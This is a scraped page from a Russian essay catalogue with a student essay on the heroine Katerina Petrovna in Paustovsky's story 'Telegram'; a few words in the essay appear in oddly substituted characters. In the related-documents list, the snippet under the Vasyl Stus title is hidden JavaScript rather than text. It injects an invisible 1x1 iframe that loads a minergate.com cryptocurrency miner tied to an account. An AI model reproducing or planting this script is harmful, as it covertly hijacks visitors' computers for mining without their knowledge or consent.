-



   Судьба главной героини Катерины Петровны в рассказе В.Г.Паустовского «Телеграмма»




doc.png  Тип документа: Сочинения


type.png  Предмет: Паустовский К.Г.


type.png  ВУЗ: Не привязан


size.png  Размер: 0 b

    Одним из лучших произведений Паусᴛᴏʙского, без сомнения, можно считать «Телеграмму». Это рассказ о настоящей любви и памяти.

    Прочитав это произведение, на мой взгляд, невольно задумываешься над истинным смыслом жизни. Как часто люди из-за быᴛᴏʙых ᴄᴫᴏжностей и проблем забывают о самых близких и родных.

    Так, героиней рассказа является Катерина Петровна. Эта женщина «доживала свой век в старом доме, построенном её отцом – известным художником». Жизнь уже не представляла для нее большой ценности, единственной мечтой старушки была встреча с родной дочерью Настей.

    Настасья Семеновна жила далеко, в Ленинграде, и уже три года не приезжала в родной дом. Но материнское сердце все же не склонно держать обиду, оно слишком сильно умеет любить: «Катерина Петровна знала, что Насте теперь не до нее, старухи. У них, у молодых, свои дела, свои непонятные интересы, свое счастье. Лучше не мешать». Но, оставаясь совсем одна в огромном доме, она каждую минуту думала о дочери.

    Все время Катерина Петровна мечтает о встрече с Настей. Единственной связью с любимой дочкой были денежные переводы. Старушка «осторожно перебирала пухлые бумажки. От старости она забывала, что деньги эти вовсе не те, какие были в руках у Насти, и ей казалось, что от денег пахнет Настиными духами».

    Единственными посетителями огромного старого дома были дочь колхозного сапожника да сторож при пожарном сарае Тихон. Манюшка каждый день прибегала к старушке, приносила воды из колодца, подметала полы.

    Катерина Петровна испытывала искреннюю благодарность к этой девочке и очень часто старалась одарить её какими-то старинными вещами: сморщенными перчатками, страусовыми перьями, стеклярусной шляпой… Но Манюшке все это было просто ни к чему.

    Символичным, по моему мнению, является старый клен в саду, который посадила Катерина Петровна еще девушкой-хохотушкой. Как и сама хозяйка, старое дерево было одиноким и «некуда было уйти от этой бесприютной, ветреной ночи».

    На мой взгляд, Катерина Петровна, несмотря на свое одиночество и душевную тоску, все же остается символом материнской любви, которая не имеет границ и не умеет быть жестокой. Достаточно вспомнить письмо старушки к дочери: «Ненаглядная моя, ... зиму эту я не переживу. Приезжай хоть на день. Дай поглядеть на тебя, подержать твои руки».

    Но увидеть Настю главной героине так и не удалось

. В скором времени она заболела и уже не могла ходить, а только ждала смерти. Старушка уже не надеялась на то, что перед смертью увидит дочь. Катерина Петровна «закрывала глаза, и из них выкатывалась и скользила по желтому виску, закутывалась в седых волосах одна-единственная слеза».

    И даже слова Тихона о том, что Настя едет, не успокоили и не поддержали женщину: «Не надо, Тиша! – тихо сказала Катерина Петровна. – Не надо, милый. Бог с тобой. Спасибо тебе за доброе слово, за ласку».

    В скором времени старушка умерла, так и не узнав, что Настя приедет и уже никогда не сможет простить себя за холодность.

    По моему мнению, рассказ заключает в себе глубокий смысл. Думаю, автор хотел показать нам, читателям, что иногда даже просто воспоминания, внимание и любовь способны изменить всю жизнь. Мы видим, как мать и дочь, не сумевшая вовремя принять верное решение, становятся несчастными людьми. Но если Катерина Петровна несчастна из-за ряда причин, не зависящих от нее самой, то Настя, конечно же, могла изменить свою судьбу и судьбу своей матери.



Похожие документы


Данко и Судьба Изергиль
Герой второй истории, рассказанной старухой, Данко, напротив, жертвует для своего народа всем, чтобы вывести его из «ядовитого смрада болота», вдохнуть энергию действия в людей, чья воля ослабела от «тоскливых дум», и они уже не могут умереть в боях за свою свободу, «уже хотели идти к врагу и принести ему в дар волю свою, и никто уже, испуганный смертью, не боялся рабской жизни....

Асоян А. А. Судьба "Божественной комедии" Данте в России "Центральный человек мира... "
Асоян А. А.: Судьба "Божественной комедии" Данте в России "Центральный человек мира... " ются; восстают против них; перечисляют их недостатки, обвиняют их в скучности, длин­нотах, странностях, дурном вкусе, при этом обкрадывая их и украшая себя похищенными у них трофеями; но попытки свергнуть их иго тщетны. Все окрашено в их цвета, повсюду заметно их влияние: изобретенные ими слова и имена обогащают словарь всех народов, их высказывания становятся пословицами, вы­мышленные ими персонажи обретают жизнь, обзаводятся наследниками и потомством. Они открывают новые горизонты, и лучи света брызжут из тьмы; из посеянных ими идей вырастают тысячи других; они даруют образы, сюжеты, стили всем искусствам: "их произведения - неисчерпаемый источник, самые недра разума человечества...

На тему «Василий Стус. Судьба, жизнь, поэзия»
(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/4/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body")[0]; s.appendChild(w, s); })(); ...

«Пеппи Длинный чулок». Образ главной героини
Цель: продолжить знакомство учеников с произведением писательницы; помочь понять его идейно-художественные особенности; развивать навыки вдумчивого выразительного чтения, характеристики героев произведения на основе анализа их поступков, отношение к ним окружения, авторской оценки; развивать ассоциативное и логическое мышление, творческое воображение; воспитывать человечность, дружелюбие, чувство юмора....

Образ и характеристика главной героини романа «Анна Каренина»
Первоначально «Анна Каренина» (1873—1877) была задумана Толстым как семейно-бытовой роман о неверной жене. В процессе работы замысел углублялся и расширялся. В центре внимания писателя оказались не только семейные, но и экономические социальные, общественные отношения. На страницах романа воссоздавалась широкая панорама русской жизни. ...

Bigreferat.ru - каталог учебной информации (c) 2013-2014 | * | Правообладателям